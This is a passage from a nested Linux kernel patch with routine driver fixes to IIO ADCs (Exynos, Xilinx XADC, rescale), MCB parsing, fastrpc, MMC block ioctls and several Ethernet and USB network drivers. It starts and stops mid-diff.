++++ b/drivers/iio/adc/exynos_adc.c
+@@ -826,16 +826,26 @@ static int exynos_adc_probe(struct platform_device *pdev)
+ 		}
+ 	}
+ 
++	/* leave out any TS related code if unreachable */
++	if (IS_REACHABLE(CONFIG_INPUT)) {
++		has_ts = of_property_read_bool(pdev->dev.of_node,
++					       "has-touchscreen") || pdata;
++	}
++
+ 	irq = platform_get_irq(pdev, 0);
+ 	if (irq < 0)
+ 		return irq;
+ 	info->irq = irq;
+ 
+-	irq = platform_get_irq(pdev, 1);
+-	if (irq == -EPROBE_DEFER)
+-		return irq;
++	if (has_ts) {
++		irq = platform_get_irq(pdev, 1);
++		if (irq == -EPROBE_DEFER)
++			return irq;
+ 
+-	info->tsirq = irq;
++		info->tsirq = irq;
++	} else {
++		info->tsirq = -1;
++	}
+ 
+ 	info->dev = &pdev->dev;
+ 
+@@ -900,12 +910,6 @@ static int exynos_adc_probe(struct platform_device *pdev)
+ 	if (info->data->init_hw)
+ 		info->data->init_hw(info);
+ 
+-	/* leave out any TS related code if unreachable */
+-	if (IS_REACHABLE(CONFIG_INPUT)) {
+-		has_ts = of_property_read_bool(pdev->dev.of_node,
+-					       "has-touchscreen") || pdata;
+-	}
+-
+ 	if (pdata)
+ 		info->delay = pdata->delay;
+ 	else
+diff --git a/drivers/iio/adc/xilinx-xadc-core.c b/drivers/iio/adc/xilinx-xadc-core.c
+index 292f2892d223a..abb8891b9e82d 100644
+--- a/drivers/iio/adc/xilinx-xadc-core.c
++++ b/drivers/iio/adc/xilinx-xadc-core.c
+@@ -456,6 +456,9 @@ static const struct xadc_ops xadc_zynq_ops = {
+ 	.interrupt_handler = xadc_zynq_interrupt_handler,
+ 	.update_alarm = xadc_zynq_update_alarm,
+ 	.type = XADC_TYPE_S7,
++	/* Temp in C = (val * 503.975) / 2**bits - 273.15 */
++	.temp_scale = 503975,
++	.temp_offset = 273150,
+ };
+ 
+ static const unsigned int xadc_axi_reg_offsets[] = {
+@@ -566,6 +569,9 @@ static const struct xadc_ops xadc_7s_axi_ops = {
+ 	.interrupt_handler = xadc_axi_interrupt_handler,
+ 	.flags = XADC_FLAGS_BUFFERED | XADC_FLAGS_IRQ_OPTIONAL,
+ 	.type = XADC_TYPE_S7,
++	/* Temp in C = (val * 503.975) / 2**bits - 273.15 */
++	.temp_scale = 503975,
++	.temp_offset = 273150,
+ };
+ 
+ static const struct xadc_ops xadc_us_axi_ops = {
+@@ -577,6 +583,12 @@ static const struct xadc_ops xadc_us_axi_ops = {
+ 	.interrupt_handler = xadc_axi_interrupt_handler,
+ 	.flags = XADC_FLAGS_BUFFERED | XADC_FLAGS_IRQ_OPTIONAL,
+ 	.type = XADC_TYPE_US,
++	/**
++	 * Values below are for UltraScale+ (SYSMONE4) using internal reference.
++	 * See https://docs.xilinx.com/v/u/en-US/ug580-ultrascale-sysmon
++	 */
++	.temp_scale = 509314,
++	.temp_offset = 280231,
+ };
+ 
+ static int _xadc_update_adc_reg(struct xadc *xadc, unsigned int reg,
+@@ -948,8 +960,7 @@ static int xadc_read_raw(struct iio_dev *indio_dev,
+ 			*val2 = bits;
+ 			return IIO_VAL_FRACTIONAL_LOG2;
+ 		case IIO_TEMP:
+-			/* Temp in C = (val * 503.975) / 2**bits - 273.15 */
+-			*val = 503975;
++			*val = xadc->ops->temp_scale;
+ 			*val2 = bits;
+ 			return IIO_VAL_FRACTIONAL_LOG2;
+ 		default:
+@@ -957,7 +968,7 @@ static int xadc_read_raw(struct iio_dev *indio_dev,
+ 		}
+ 	case IIO_CHAN_INFO_OFFSET:
+ 		/* Only the temperature channel has an offset */
+-		*val = -((273150 << bits) / 503975);
++		*val = -((xadc->ops->temp_offset << bits) / xadc->ops->temp_scale);
+ 		return IIO_VAL_INT;
+ 	case IIO_CHAN_INFO_SAMP_FREQ:
+ 		ret = xadc_read_samplerate(xadc);
+@@ -1426,28 +1437,6 @@ static int xadc_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		return ret;
+ 
+-	/* Disable all alarms */
+-	ret = xadc_update_adc_reg(xadc, XADC_REG_CONF1, XADC_CONF1_ALARM_MASK,
+-				  XADC_CONF1_ALARM_MASK);
+-	if (ret)
+-		return ret;
+-
+-	/* Set thresholds to min/max */
+-	for (i = 0; i < 16; i++) {
+-		/*
+-		 * Set max voltage threshold and both temperature thresholds to
+-		 * 0xffff, min voltage threshold to 0.
+-		 */
+-		if (i % 8 < 4 || i == 7)
+-			xadc->threshold[i] = 0xffff;
+-		else
+-			xadc->threshold[i] = 0;
+-		ret = xadc_write_adc_reg(xadc, XADC_REG_THRESHOLD(i),
+-			xadc->threshold[i]);
+-		if (ret)
+-			return ret;
+-	}
+-
+ 	/* Go to non-buffered mode */
+ 	xadc_postdisable(indio_dev);
+ 
+diff --git a/drivers/iio/adc/xilinx-xadc.h b/drivers/iio/adc/xilinx-xadc.h
+index 7d78ce6989671..3036f4d613ff5 100644
+--- a/drivers/iio/adc/xilinx-xadc.h
++++ b/drivers/iio/adc/xilinx-xadc.h
+@@ -85,6 +85,8 @@ struct xadc_ops {
+ 
+ 	unsigned int flags;
+ 	enum xadc_type type;
++	int temp_scale;
++	int temp_offset;
+ };
+ 
+ static inline int _xadc_read_adc_reg(struct xadc *xadc, unsigned int reg,
+diff --git a/drivers/iio/afe/iio-rescale.c b/drivers/iio/afe/iio-rescale.c
+index 1f280c360701b..56e5913ab82d1 100644
+--- a/drivers/iio/afe/iio-rescale.c
++++ b/drivers/iio/afe/iio-rescale.c
+@@ -214,8 +214,18 @@ static int rescale_read_raw(struct iio_dev *indio_dev,
+ 				return ret < 0 ? ret : -EOPNOTSUPP;
+ 		}
+ 
+-		ret = iio_read_channel_scale(rescale->source, &scale, &scale2);
+-		return rescale_process_offset(rescale, ret, scale, scale2,
++		if (iio_channel_has_info(rescale->source->channel,
++					 IIO_CHAN_INFO_SCALE)) {
++			ret = iio_read_channel_scale(rescale->source, &scale, &scale2);
++			return rescale_process_offset(rescale, ret, scale, scale2,
++						      schan_off, val, val2);
++		}
++
++		/*
++		 * If we get here we have no scale so scale 1:1 but apply
++		 * rescaler and offset, if any.
++		 */
++		return rescale_process_offset(rescale, IIO_VAL_FRACTIONAL, 1, 1,
+ 					      schan_off, val, val2);
+ 	default:
+ 		return -EINVAL;
+@@ -280,8 +290,9 @@ static int rescale_configure_channel(struct device *dev,
+ 	chan->type = rescale->cfg->type;
+ 
+ 	if (iio_channel_has_info(schan, IIO_CHAN_INFO_RAW) &&
+-	    iio_channel_has_info(schan, IIO_CHAN_INFO_SCALE)) {
+-		dev_info(dev, "using raw+scale source channel\n");
++	    (iio_channel_has_info(schan, IIO_CHAN_INFO_SCALE) ||
++	     iio_channel_has_info(schan, IIO_CHAN_INFO_OFFSET))) {
++		dev_info(dev, "using raw+scale/offset source channel\n");
+ 	} else if (iio_channel_has_info(schan, IIO_CHAN_INFO_PROCESSED)) {
+ 		dev_info(dev, "using processed channel\n");
+ 		rescale->chan_processed = true;
+diff --git a/drivers/mcb/mcb-lpc.c b/drivers/mcb/mcb-lpc.c
+index 53decd89876ee..a851e02364642 100644
+--- a/drivers/mcb/mcb-lpc.c
++++ b/drivers/mcb/mcb-lpc.c
+@@ -23,7 +23,7 @@ static int mcb_lpc_probe(struct platform_device *pdev)
+ {
+ 	struct resource *res;
+ 	struct priv *priv;
+-	int ret = 0;
++	int ret = 0, table_size;
+ 
+ 	priv = devm_kzalloc(&pdev->dev, sizeof(*priv), GFP_KERNEL);
+ 	if (!priv)
+@@ -58,16 +58,43 @@ static int mcb_lpc_probe(struct platform_device *pdev)
+ 
+ 	ret = chameleon_parse_cells(priv->bus, priv->mem->start, priv->base);
+ 	if (ret < 0) {
+-		mcb_release_bus(priv->bus);
+-		return ret;
++		goto out_mcb_bus;
+ 	}
+ 
+-	dev_dbg(&pdev->dev, "Found %d cells\n", ret);
++	table_size = ret;
++
++	if (table_size < CHAM_HEADER_SIZE) {
++		/* Release the previous resources */
++		devm_iounmap(&pdev->dev, priv->base);
++		devm_release_mem_region(&pdev->dev, priv->mem->start, resource_size(priv->mem));
++
++		/* Then, allocate it again with the actual chameleon table size */
++		res = devm_request_mem_region(&pdev->dev, priv->mem->start,
++					      table_size,
++					      KBUILD_MODNAME);
++		if (!res) {
++			dev_err(&pdev->dev, "Failed to request PCI memory\n");
++			ret = -EBUSY;
++			goto out_mcb_bus;
++		}
++
++		priv->base = devm_ioremap(&pdev->dev, priv->mem->start, table_size);
++		if (!priv->base) {
++			dev_err(&pdev->dev, "Cannot ioremap\n");
++			ret = -ENOMEM;
++			goto out_mcb_bus;
++		}
++
++		platform_set_drvdata(pdev, priv);
++	}
+ 
+ 	mcb_bus_add_devices(priv->bus);
+ 
+ 	return 0;
+ 
++out_mcb_bus:
++	mcb_release_bus(priv->bus);
++	return ret;
+ }
+ 
+ static int mcb_lpc_remove(struct platform_device *pdev)
+diff --git a/drivers/mcb/mcb-parse.c b/drivers/mcb/mcb-parse.c
+index c41cbacc75a2c..656b6b71c7682 100644
+--- a/drivers/mcb/mcb-parse.c
++++ b/drivers/mcb/mcb-parse.c
+@@ -128,7 +128,7 @@ static void chameleon_parse_bar(void __iomem *base,
+ 	}
+ }
+ 
+-static int chameleon_get_bar(char __iomem **base, phys_addr_t mapbase,
++static int chameleon_get_bar(void __iomem **base, phys_addr_t mapbase,
+ 			     struct chameleon_bar **cb)
+ {
+ 	struct chameleon_bar *c;
+@@ -177,12 +177,13 @@ int chameleon_parse_cells(struct mcb_bus *bus, phys_addr_t mapbase,
+ {
+ 	struct chameleon_fpga_header *header;
+ 	struct chameleon_bar *cb;
+-	char __iomem *p = base;
++	void __iomem *p = base;
+ 	int num_cells = 0;
+ 	uint32_t dtype;
+ 	int bar_count;
+ 	int ret;
+ 	u32 hsize;
++	u32 table_size;
+ 
+ 	hsize = sizeof(struct chameleon_fpga_header);
+ 
+@@ -237,12 +238,16 @@ int chameleon_parse_cells(struct mcb_bus *bus, phys_addr_t mapbase,
+ 		num_cells++;
+ 	}
+ 
+-	if (num_cells == 0)
+-		num_cells = -EINVAL;
++	if (num_cells == 0) {
++		ret = -EINVAL;
++		goto free_bar;
++	}
+ 
++	table_size = p - base;
++	pr_debug("%d cell(s) found. Chameleon table size: 0x%04x bytes\n", num_cells, table_size);
+ 	kfree(cb);
+ 	kfree(header);
+-	return num_cells;
++	return table_size;
+ 
+ free_bar:
+ 	kfree(cb);
+diff --git a/drivers/misc/fastrpc.c b/drivers/misc/fastrpc.c
+index 4c51d216f3d43..cc57cc8204328 100644
+--- a/drivers/misc/fastrpc.c
++++ b/drivers/misc/fastrpc.c
+@@ -903,6 +903,7 @@ static int fastrpc_get_args(u32 kernel, struct fastrpc_invoke_ctx *ctx)
+ 	if (err)
+ 		return err;
+ 
++	memset(ctx->buf->virt, 0, pkt_size);
+ 	rpra = ctx->buf->virt;
+ 	list = fastrpc_invoke_buf_start(rpra, ctx->nscalars);
+ 	pages = fastrpc_phy_page_start(list, ctx->nscalars);
+@@ -1035,6 +1036,7 @@ static int fastrpc_put_args(struct fastrpc_invoke_ctx *ctx,
+ 		}
+ 	}
+ 
++	/* Clean up fdlist which is updated by DSP */
+ 	for (i = 0; i < FASTRPC_MAX_FDLIST; i++) {
+ 		if (!fdlist[i])
+ 			break;
+@@ -1099,11 +1101,9 @@ static int fastrpc_internal_invoke(struct fastrpc_user *fl,  u32 kernel,
+ 	if (IS_ERR(ctx))
+ 		return PTR_ERR(ctx);
+ 
+-	if (ctx->nscalars) {
+-		err = fastrpc_get_args(kernel, ctx);
+-		if (err)
+-			goto bail;
+-	}
++	err = fastrpc_get_args(kernel, ctx);
++	if (err)
++		goto bail;
+ 
+ 	/* make sure that all CPU memory writes are seen by DSP */
+ 	dma_wmb();
+@@ -1119,6 +1119,13 @@ static int fastrpc_internal_invoke(struct fastrpc_user *fl,  u32 kernel,
+ 		err = wait_for_completion_interruptible(&ctx->work);
+ 	}
+ 
++	if (err)
++		goto bail;
++
++	/* make sure that all memory writes by DSP are seen by CPU */
++	dma_rmb();
++	/* populate all the output buffers with results */
++	err = fastrpc_put_args(ctx, kernel);
+ 	if (err)
+ 		goto bail;
+ 
+@@ -1127,15 +1134,6 @@ static int fastrpc_internal_invoke(struct fastrpc_user *fl,  u32 kernel,
+ 	if (err)
+ 		goto bail;
+ 
+-	if (ctx->nscalars) {
+-		/* make sure that all memory writes by DSP are seen by CPU */
+-		dma_rmb();
+-		/* populate all the output buffers with results */
+-		err = fastrpc_put_args(ctx, kernel);
+-		if (err)
+-			goto bail;
+-	}
+-
+ bail:
+ 	if (err != -ERESTARTSYS && err != -ETIMEDOUT) {
+ 		/* We are done with this compute context */
+@@ -1785,11 +1783,13 @@ static int fastrpc_req_mem_unmap_impl(struct fastrpc_user *fl, struct fastrpc_me
+ 	sc = FASTRPC_SCALARS(FASTRPC_RMID_INIT_MEM_UNMAP, 1, 0);
+ 	err = fastrpc_internal_invoke(fl, true, FASTRPC_INIT_HANDLE, sc,
+ 				      &args[0]);
+-	fastrpc_map_put(map);
+-	if (err)
++	if (err) {
+ 		dev_err(dev, "unmmap\tpt fd = %d, 0x%09llx error\n",  map->fd, map->raddr);
++		return err;
++	}
++	fastrpc_map_put(map);
+ 
+-	return err;
++	return 0;
+ }
+ 
+ static int fastrpc_req_mem_unmap(struct fastrpc_user *fl, char __user *argp)
+diff --git a/drivers/mmc/core/block.c b/drivers/mmc/core/block.c
+index cdd7f126d4aea..1fc6767f18782 100644
+--- a/drivers/mmc/core/block.c
++++ b/drivers/mmc/core/block.c
+@@ -180,6 +180,8 @@ static void mmc_blk_rw_rq_prep(struct mmc_queue_req *mqrq,
+ 			       int recovery_mode,
+ 			       struct mmc_queue *mq);
+ static void mmc_blk_hsq_req_done(struct mmc_request *mrq);
++static int mmc_spi_err_check(struct mmc_card *card);
++static int mmc_blk_busy_cb(void *cb_data, bool *busy);
+ 
+ static struct mmc_blk_data *mmc_blk_get(struct gendisk *disk)
+ {
+@@ -471,6 +473,8 @@ static int __mmc_blk_ioctl_cmd(struct mmc_card *card, struct mmc_blk_data *md,
+ 	struct mmc_data data = {};
+ 	struct mmc_request mrq = {};
+ 	struct scatterlist sg;
++	bool r1b_resp;
++	unsigned int busy_timeout_ms;
+ 	int err;
+ 	unsigned int target_part;
+ 
+@@ -559,6 +563,12 @@ static int __mmc_blk_ioctl_cmd(struct mmc_card *card, struct mmc_blk_data *md,
+ 	    (cmd.opcode == MMC_SWITCH))
+ 		return mmc_sanitize(card, idata->ic.cmd_timeout_ms);
+ 
++	/* If it's an R1B response we need some more preparations. */
++	busy_timeout_ms = idata->ic.cmd_timeout_ms ? : MMC_BLK_TIMEOUT_MS;
++	r1b_resp = (cmd.flags & MMC_RSP_R1B) == MMC_RSP_R1B;
++	if (r1b_resp)
++		mmc_prepare_busy_cmd(card->host, &cmd, busy_timeout_ms);
++
+ 	mmc_wait_for_req(card->host, &mrq);
+ 	memcpy(&idata->ic.response, cmd.resp, sizeof(cmd.resp));
+ 
+@@ -610,13 +620,27 @@ static int __mmc_blk_ioctl_cmd(struct mmc_card *card, struct mmc_blk_data *md,
+ 	if (idata->ic.postsleep_min_us)
+ 		usleep_range(idata->ic.postsleep_min_us, idata->ic.postsleep_max_us);
+ 
+-	if (idata->rpmb || (cmd.flags & MMC_RSP_R1B) == MMC_RSP_R1B) {
+-		/*
+-		 * Ensure RPMB/R1B command has completed by polling CMD13 "Send Status". Here we
+-		 * allow to override the default timeout value if a custom timeout is specified.
+-		 */
+-		err = mmc_poll_for_busy(card, idata->ic.cmd_timeout_ms ? : MMC_BLK_TIMEOUT_MS,
+-					false, MMC_BUSY_IO);
++	if (mmc_host_is_spi(card->host)) {
++		if (idata->ic.write_flag || r1b_resp || cmd.flags & MMC_RSP_SPI_BUSY)
++			return mmc_spi_err_check(card);
++		return err;
++	}
++
++	/*
++	 * Ensure RPMB, writes and R1B responses are completed by polling with
++	 * CMD13. Note that, usually we don't need to poll when using HW busy
++	 * detection, but here it's needed since some commands may indicate the
++	 * error through the R1 status bits.
++	 */
++	if (idata->rpmb || idata->ic.write_flag || r1b_resp) {
++		struct mmc_blk_busy_data cb_data = {
++			.card = card,
++		};
++
++		err = __mmc_poll_for_busy(card->host, 0, busy_timeout_ms,
++					  &mmc_blk_busy_cb, &cb_data);
++
++		idata->ic.response[0] = cb_data.status;
+ 	}
+ 
+ 	return err;
+diff --git a/drivers/mmc/core/mmc_ops.c b/drivers/mmc/core/mmc_ops.c
+index 81c55bfd6e0c2..3b3adbddf6641 100644
+--- a/drivers/mmc/core/mmc_ops.c
++++ b/drivers/mmc/core/mmc_ops.c
+@@ -575,6 +575,7 @@ bool mmc_prepare_busy_cmd(struct mmc_host *host, struct mmc_command *cmd,
+ 	cmd->busy_timeout = timeout_ms;
+ 	return true;
+ }
++EXPORT_SYMBOL_GPL(mmc_prepare_busy_cmd);
+ 
+ /**
+  *	__mmc_switch - modify EXT_CSD register
+diff --git a/drivers/net/ethernet/adi/adin1110.c b/drivers/net/ethernet/adi/adin1110.c
+index ed2863ed6a5bb..7474afc0e8e73 100644
+--- a/drivers/net/ethernet/adi/adin1110.c
++++ b/drivers/net/ethernet/adi/adin1110.c
+@@ -294,7 +294,7 @@ static int adin1110_read_fifo(struct adin1110_port_priv *port_priv)
+ {
+ 	struct adin1110_priv *priv = port_priv->priv;
+ 	u32 header_len = ADIN1110_RD_HEADER_LEN;
+-	struct spi_transfer t;
++	struct spi_transfer t = {0};
+ 	u32 frame_size_no_fcs;
+ 	struct sk_buff *rxb;
+ 	u32 frame_size;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e.h b/drivers/net/ethernet/intel/i40e/i40e.h
+index a81f918091ccf..7d4cc4eafd59e 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e.h
++++ b/drivers/net/ethernet/intel/i40e/i40e.h
+@@ -580,7 +580,6 @@ struct i40e_pf {
+ #define I40E_FLAG_DISABLE_FW_LLDP		BIT(24)
+ #define I40E_FLAG_RS_FEC			BIT(25)
+ #define I40E_FLAG_BASE_R_FEC			BIT(26)
+-#define I40E_FLAG_VF_VLAN_PRUNING		BIT(27)
+ /* TOTAL_PORT_SHUTDOWN
+  * Allows to physically disable the link on the NIC's port.
+  * If enabled, (after link down request from the OS)
+@@ -603,6 +602,7 @@ struct i40e_pf {
+  *   in abilities field of i40e_aq_set_phy_config structure
+  */
+ #define I40E_FLAG_TOTAL_PORT_SHUTDOWN_ENABLED	BIT(27)
++#define I40E_FLAG_VF_VLAN_PRUNING		BIT(28)
+ 
+ 	struct i40e_client_instance *cinst;
+ 	bool stat_offsets_loaded;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c
+index 494775d65bf28..6d26ee8eefae9 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c
+@@ -2770,7 +2770,7 @@ tx_only:
+ 		return budget;
+ 	}
+ 
+-	if (vsi->back->flags & I40E_TXR_FLAGS_WB_ON_ITR)
++	if (q_vector->tx.ring[0].flags & I40E_TXR_FLAGS_WB_ON_ITR)
+ 		q_vector->arm_wb_state = false;
+ 
+ 	/* Exit the polling mode, but don't re-enable interrupts if stack might
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index a39f7f0d6ab0b..326bb5fdf5f90 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -1449,9 +1449,9 @@ void iavf_down(struct iavf_adapter *adapter)
+ 			adapter->aq_required |= IAVF_FLAG_AQ_DEL_FDIR_FILTER;
+ 		if (!list_empty(&adapter->adv_rss_list_head))
+ 			adapter->aq_required |= IAVF_FLAG_AQ_DEL_ADV_RSS_CFG;
+-		adapter->aq_required |= IAVF_FLAG_AQ_DISABLE_QUEUES;
+ 	}
+ 
++	adapter->aq_required |= IAVF_FLAG_AQ_DISABLE_QUEUES;
+ 	mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ }
+ 
+@@ -5020,8 +5020,6 @@ static int iavf_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	INIT_WORK(&adapter->finish_config, iavf_finish_config);
+ 	INIT_DELAYED_WORK(&adapter->watchdog_task, iavf_watchdog_task);
+ 	INIT_DELAYED_WORK(&adapter->client_task, iavf_client_task);
+-	queue_delayed_work(adapter->wq, &adapter->watchdog_task,
+-			   msecs_to_jiffies(5 * (pdev->devfn & 0x07)));
+ 
+ 	/* Setup the wait queue for indicating transition to down status */
+ 	init_waitqueue_head(&adapter->down_waitqueue);
+@@ -5032,6 +5030,9 @@ static int iavf_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* Setup the wait queue for indicating virtchannel events */
+ 	init_waitqueue_head(&adapter->vc_waitqueue);
+ 
++	queue_delayed_work(adapter->wq, &adapter->watchdog_task,
++			   msecs_to_jiffies(5 * (pdev->devfn & 0x07)));
++	/* Initialization goes on in the work. Do not add more of it below. */
+ 	return 0;
+ 
+ err_ioremap:
+diff --git a/drivers/net/ethernet/intel/igb/igb_ethtool.c b/drivers/net/ethernet/intel/igb/igb_ethtool.c
+index 96fa1c420f910..ceff537d9d22d 100644
+--- a/drivers/net/ethernet/intel/igb/igb_ethtool.c
++++ b/drivers/net/ethernet/intel/igb/igb_ethtool.c
+@@ -2978,11 +2978,15 @@ static int igb_add_ethtool_nfc_entry(struct igb_adapter *adapter,
+ 	if (err)
+ 		goto err_out_w_lock;
+ 
+-	igb_update_ethtool_nfc_entry(adapter, input, input->sw_idx);
++	err = igb_update_ethtool_nfc_entry(adapter, input, input->sw_idx);
++	if (err)
++		goto err_out_input_filter;
+ 
+ 	spin_unlock(&adapter->nfc_lock);
+ 	return 0;
+ 
++err_out_input_filter:
++	igb_erase_filter(adapter, input);
+ err_out_w_lock:
+ 	spin_unlock(&adapter->nfc_lock);
+ err_out:
+diff --git a/drivers/net/ethernet/intel/igc/igc_ethtool.c b/drivers/net/ethernet/intel/igc/igc_ethtool.c
+index e23b95edb05ef..81897f7a90a91 100644
+--- a/drivers/net/ethernet/intel/igc/igc_ethtool.c
++++ b/drivers/net/ethernet/intel/igc/igc_ethtool.c
+@@ -1817,7 +1817,7 @@ igc_ethtool_set_link_ksettings(struct net_device *netdev,
+ 	struct igc_adapter *adapter = netdev_priv(netdev);
+ 	struct net_device *dev = adapter->netdev;
+ 	struct igc_hw *hw = &adapter->hw;
+-	u32 advertising;
++	u16 advertised = 0;
+ 
+ 	/* When adapter in resetting mode, autoneg/speed/duplex
+ 	 * cannot be changed
+@@ -1842,18 +1842,33 @@ igc_ethtool_set_link_ksettings(struct net_device *netdev,
+ 	while (test_and_set_bit(__IGC_RESETTING, &adapter->state))
+ 		usleep_range(1000, 2000);
+ 
+-	ethtool_convert_link_mode_to_legacy_u32(&advertising,
+-						cmd->link_modes.advertising);
+-	/* Converting to legacy u32 drops ETHTOOL_LINK_MODE_2500baseT_Full_BIT.
+-	 * We have to check this and convert it to ADVERTISE_2500_FULL
+-	 * (aka ETHTOOL_LINK_MODE_2500baseX_Full_BIT) explicitly.
+-	 */
+-	if (ethtool_link_ksettings_test_link_mode(cmd, advertising, 2500baseT_Full))
+-		advertising |= ADVERTISE_2500_FULL;
++	if (ethtool_link_ksettings_test_link_mode(cmd, advertising,
++						  2500baseT_Full))
++		advertised |= ADVERTISE_2500_FULL;
++
++	if (ethtool_link_ksettings_test_link_mode(cmd, advertising,
++						  1000baseT_Full))
++		advertised |= ADVERTISE_1000_FULL;
++
++	if (ethtool_link_ksettings_test_link_mode(cmd, advertising,
++						  100baseT_Full))
++		advertised |= ADVERTISE_100_FULL;
++
++	if (ethtool_link_ksettings_test_link_mode(cmd, advertising,
++						  100baseT_Half))
++		advertised |= ADVERTISE_100_HALF;
++
++	if (ethtool_link_ksettings_test_link_mode(cmd, advertising,
++						  10baseT_Full))
++		advertised |= ADVERTISE_10_FULL;
++
++	if (ethtool_link_ksettings_test_link_mode(cmd, advertising,
++						  10baseT_Half))
++		advertised |= ADVERTISE_10_HALF;
+ 
+ 	if (cmd->base.autoneg == AUTONEG_ENABLE) {
+ 		hw->mac.autoneg = 1;
+-		hw->phy.autoneg_advertised = advertising;
++		hw->phy.autoneg_advertised = advertised;
+ 		if (adapter->fc_autoneg)
+ 			hw->fc.requested_mode = igc_fc_default;
+ 	} else {
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index a9a0dca0c0305..80b6079b8a8e3 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -4343,7 +4343,7 @@ static void rtl_tx(struct net_device *dev, struct rtl8169_private *tp,
+ 		unsigned int entry = dirty_tx % NUM_TX_DESC;
+ 		u32 status;
+ 
+-		status = le32_to_cpu(tp->TxDescArray[entry].opts1);
++		status = le32_to_cpu(READ_ONCE(tp->TxDescArray[entry].opts1));
+ 		if (status & DescOwn)
+ 			break;
+ 
+@@ -4380,7 +4380,7 @@ static void rtl_tx(struct net_device *dev, struct rtl8169_private *tp,
+ 		 * If skb is NULL then we come here again once a tx irq is
+ 		 * triggered after the last fragment is marked transmitted.
+ 		 */
+-		if (tp->cur_tx != dirty_tx && skb)
++		if (READ_ONCE(tp->cur_tx) != dirty_tx && skb)
+ 			rtl8169_doorbell(tp);
+ 	}
+ }
+@@ -4413,7 +4413,7 @@ static int rtl_rx(struct net_device *dev, struct rtl8169_private *tp, int budget
+ 		dma_addr_t addr;
+ 		u32 status;
+ 
+-		status = le32_to_cpu(desc->opts1);
++		status = le32_to_cpu(READ_ONCE(desc->opts1));
+ 		if (status & DescOwn)
+ 			break;
+ 
+diff --git a/drivers/net/ethernet/toshiba/ps3_gelic_wireless.c b/drivers/net/ethernet/toshiba/ps3_gelic_wireless.c
+index dc14a66583ff3..44488c153ea25 100644
+--- a/drivers/net/ethernet/toshiba/ps3_gelic_wireless.c
++++ b/drivers/net/ethernet/toshiba/ps3_gelic_wireless.c
+@@ -1217,7 +1217,7 @@ static int gelic_wl_set_encodeext(struct net_device *netdev,
+ 		key_index = wl->current_key;
+ 
+ 	if (!enc->length && (ext->ext_flags & IW_ENCODE_EXT_SET_TX_KEY)) {
+-		/* reques to change default key index */
++		/* request to change default key index */
+ 		pr_debug("%s: request to change default key to %d\n",
+ 			 __func__, key_index);
+ 		wl->current_key = key_index;
+diff --git a/drivers/net/gtp.c b/drivers/net/gtp.c
+index acb20ad4e37eb..477b4d4f860bd 100644
+--- a/drivers/net/gtp.c
++++ b/drivers/net/gtp.c
+@@ -871,8 +871,9 @@ static int gtp_build_skb_ip4(struct sk_buff *skb, struct net_device *dev,
+ 
+ 	skb_dst_update_pmtu_no_confirm(skb, mtu);
+ 
+-	if (!skb_is_gso(skb) && (iph->frag_off & htons(IP_DF)) &&
+-	    mtu < ntohs(iph->tot_len)) {
++	if (iph->frag_off & htons(IP_DF) &&
++	    ((!skb_is_gso(skb) && skb->len > mtu) ||
++	     (skb_is_gso(skb) && !skb_gso_validate_network_len(skb, mtu)))) {
+ 		netdev_dbg(dev, "packet too big, fragmentation needed\n");
+ 		icmp_ndo_send(skb, ICMP_DEST_UNREACH, ICMP_FRAG_NEEDED,
+ 			      htonl(mtu));
+diff --git a/drivers/net/ieee802154/adf7242.c b/drivers/net/ieee802154/adf7242.c
+index 5cf218c674a5a..32d92bdabd234 100644
+--- a/drivers/net/ieee802154/adf7242.c
++++ b/drivers/net/ieee802154/adf7242.c
+@@ -1162,9 +1162,10 @@ static int adf7242_stats_show(struct seq_file *file, void *offset)
+ 
+ static void adf7242_debugfs_init(struct adf7242_local *lp)
+ {
+-	char debugfs_dir_name[DNAME_INLINE_LEN + 1] = "adf7242-";
++	char debugfs_dir_name[DNAME_INLINE_LEN + 1];
+ 
+-	strncat(debugfs_dir_name, dev_name(&lp->spi->dev), DNAME_INLINE_LEN);
++	snprintf(debugfs_dir_name, sizeof(debugfs_dir_name),
++		 "adf7242-%s", dev_name(&lp->spi->dev));
+ 
+ 	lp->debugfs_root = debugfs_create_dir(debugfs_dir_name, NULL);
+ 
+diff --git a/drivers/net/usb/r8152.c b/drivers/net/usb/r8152.c
+index fc1458f96e170..c34974f7dfd26 100644
+--- a/drivers/net/usb/r8152.c
++++ b/drivers/net/usb/r8152.c
+@@ -1211,7 +1211,7 @@ int get_registers(struct r8152 *tp, u16 value, u16 index, u16 size, void *data)
+ 
+ 	ret = usb_control_msg(tp->udev, tp->pipe_ctrl_in,
+ 			      RTL8152_REQ_GET_REGS, RTL8152_REQT_READ,
+-			      value, index, tmp, size, 500);
++			      value, index, tmp, size, USB_CTRL_GET_TIMEOUT);
+ 	if (ret < 0)
+ 		memset(data, 0xff, size);
+ 	else
+@@ -1234,7 +1234,7 @@ int set_registers(struct r8152 *tp, u16 value, u16 index, u16 size, void *data)
+ 
+ 	ret = usb_control_msg(tp->udev, tp->pipe_ctrl_out,
+ 			      RTL8152_REQ_SET_REGS, RTL8152_REQT_WRITE,
+-			      value, index, tmp, size, 500);
++			      value, index, tmp, size, USB_CTRL_SET_TIMEOUT);
+ 
+ 	kfree(tmp);
+ 
+@@ -9549,7 +9549,8 @@ u8 rtl8152_get_version(struct usb_interface *intf)
+ 
+ 	ret = usb_control_msg(udev, usb_rcvctrlpipe(udev, 0),
+ 			      RTL8152_REQ_GET_REGS, RTL8152_REQT_READ,
+-			      PLA_TCR0, MCU_TYPE_PLA, tmp, sizeof(*tmp), 500);
